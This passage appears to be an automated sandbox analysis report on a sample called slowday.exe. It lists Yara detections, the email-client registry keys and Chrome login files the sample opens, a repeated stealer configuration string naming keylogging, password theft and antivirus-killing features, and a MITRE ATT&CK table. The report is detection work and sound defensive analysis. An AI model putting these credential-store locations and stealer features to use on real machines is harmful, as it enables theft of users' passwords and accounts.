            Source: Yara match | File source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: slowday.exe PID: 6820, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: winlogons.exe PID: 6236, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara match | File source: 19.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.680dc50.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.6771c10.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 21.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 19.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 19.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 21.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.3.RegAsm.exe.47c35a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.6a21c10.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 19.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.ec0345.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.4af0000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.6abdc50.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 21.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 21.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.66d5bd0.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.3.RegAsm.exe.47c38ed.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.4af0345.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 21.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 19.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 21.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.6985bd0.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 19.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 21.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.3.RegAsm.exe.43635a8.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 19.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 19.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 19.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.3.RegAsm.exe.43635a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 21.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 21.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.3.RegAsm.exe.43638ed.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.3.RegAsm.exe.47c38ed.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 10.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.ec0000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 21.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.3.RegAsm.exe.47c35a8.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.ec0345.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.3.RegAsm.exe.43638ed.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 19.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 19.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 21.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.4af0000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 19.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.6771c10.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.6abdc50.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.4af0345.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.680dc50.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.6a21c10.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.66d5bd0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.6985bd0.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000000.250900010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000000.322785031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.265133062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.265486423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000000.335659001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000000.323179438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.507015977.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000000.289449551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000000.251237329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.260557591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000000.305602938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000000.335973967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.507883137.0000000002D53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000000.305230219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.507560729.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.287929150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.507298136.0000000003106000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.250194862.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.250547287.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.507684707.0000000003176000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.289148039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.287452128.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.507061368.0000000003012000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: vbc.exe PID: 6984, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: vbc.exe PID: 6244, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: vbc.exe PID: 3356, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: vbc.exe PID: 4724, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: vbc.exe PID: 7084, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: vbc.exe PID: 5852, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: vbc.exe PID: 408, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: Process Memory Space: slowday.exe PID: 6820, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: winlogons.exe PID: 6236, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR
            Source: slowday.exe, 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: slowday.exe, 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: RegAsm.exe, 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: RegAsm.exe, 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: winlogons.exe, 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: winlogons.exe, 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: RegAsm.exe, 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: RegAsm.exe, 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp | String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            MITRE ATT&CK Matrix (one row per line; the bracketed numbers are the per-cell signature-count badges shown in the original matrix; "-" marks an empty cell)

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | [1 1 1] Windows Management Instrumentation | [1] DLL Side-Loading | [1] DLL Side-Loading | [1] Disable or Modify Tools | [1] OS Credential Dumping | [1] System Time Discovery | Remote Services | [1 1] Archive Collected Data | Exfiltration Over Other Network Medium | [1] Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | [1 3] Native API | [2] Registry Run Keys / Startup Folder | [1] Access Token Manipulation | [1 1] Deobfuscate/Decode Files or Information | [2 1] Input Capture | [2] File and Directory Discovery | Remote Desktop Protocol | [1] Data from Local System | Exfiltration Over Bluetooth | [1] Remote Access Software | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
